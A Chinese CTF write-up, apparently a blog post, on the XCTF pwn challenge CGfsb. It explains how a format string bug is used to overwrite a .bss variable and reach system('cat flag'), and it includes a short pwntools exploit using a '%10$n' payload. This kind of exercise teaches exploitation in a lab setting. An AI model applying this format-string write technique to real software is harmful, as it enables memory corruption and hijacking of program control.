[PWN](攻防世界)CGfsb

分析程序漏洞

  • 32位的程序,有 Canary 防护措施,栈不可执行技术
    checksec获得程序的基本信息

  • 由于没有开启PIE,可以通过格式化字符串漏洞直接修改存在于 .bss 段的 pwnme 变量的值为 8,从而劫持程序执行流,执行system("cat flag);语句,获取 flag
    程序中的格式化字符串漏洞

  • 接下来 ,我们需要通过动态调试找到输入的字符串相对于格式化字符串的偏移

      在 printf(&s); 处下断点,输入一些容易识别的字符串,方便找到偏移量
    

    printf函数地址
    格式化字符串偏移
    在这里插入图片描述

      	可见,格式化字符串的偏移为10,而且 pwnme 变量的地址没有截断字符 \x00 ,
      可以将 pwnme 变量的地址直接放在前面
    

利用程序

from pwn import *

context(arch = 'amd64')
context(log_level = 'DEBUG')
context(terminal = ['deepin-terminal', '-x', 'sh', '-c'])

io = process('./CGfsb')

pwnme_addr = 0x0804A068
payload = p32(pwnme_addr) + b'AAAA' + b'%10$n'
io.recvuntil(b'your name:\n')
io.send(b'HHHH')
io.recvuntil(b'message please:\n')
io.sendline(payload)

io.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值